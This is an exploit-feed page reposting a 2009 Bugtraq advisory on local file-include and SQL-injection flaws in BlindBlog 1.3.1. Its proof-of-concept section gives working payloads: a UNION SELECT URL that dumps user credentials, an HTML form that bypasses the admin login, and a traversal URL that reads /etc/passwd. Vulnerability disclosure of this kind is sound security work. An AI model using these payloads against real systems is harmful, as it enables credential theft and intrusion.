No account yet?
Home » Exploits » BlindBlog Multiple Local File Include and SQL Injection Vulnerabilities
BlindBlog Multiple Local File Include and SQL Injection Vulnerabilities E-mail
Feeds - Exploits
Written by Salvatore 'drosophila' Fresta   
Wednesday, 04 March 2009 21:54
BlindBlog Multiple Local File Include and SQL Injection Vulnerabilities


-\\Bugtraq ID:
33980

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 04 2009 12:00AM

-\\Updated:
Mar 04 2009 12:00AM

-\\Credit:
Salvatore 'drosophila' Fresta



-\\Vulnerable:
BlindBlog BlindBlog 1.3.1



-\\Discussion
BlindBlog is prone to a local file-include vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks.

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

BlindBlog 1.3.1 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
Attackers can exploit these issues via a browser.

The following proof-of-concepts are available:

===============================================================
33980.html
^^^^^^^^^^^
http://www..example.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23


<html>
       <head>
               <title>BlindBlog 1.3.1 Authentication Bypass Exploit</title>
       </head>
       <body>
               <form
action="http://www.example.com/path/admin/admin.login.php?go=1"
method="POST">
                       <input type="hidden" name="username" value="-1'
UNION ALL SELECT
1,'admin',MD5('expl')#">
                       <input type="hidden" name="password" value="expl">
                       <input type="submit" value="Exploit">
               </form>
       </body>
</html>


http://www.example.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00




-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent   information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--Vendor Homepage
http://sourceforge.net/projects/cbblog  (BlindBlog)
--BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass -
http://www.securityfocus.com/archive/1/50142  (Salvatore \"drosophila\" Fresta)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff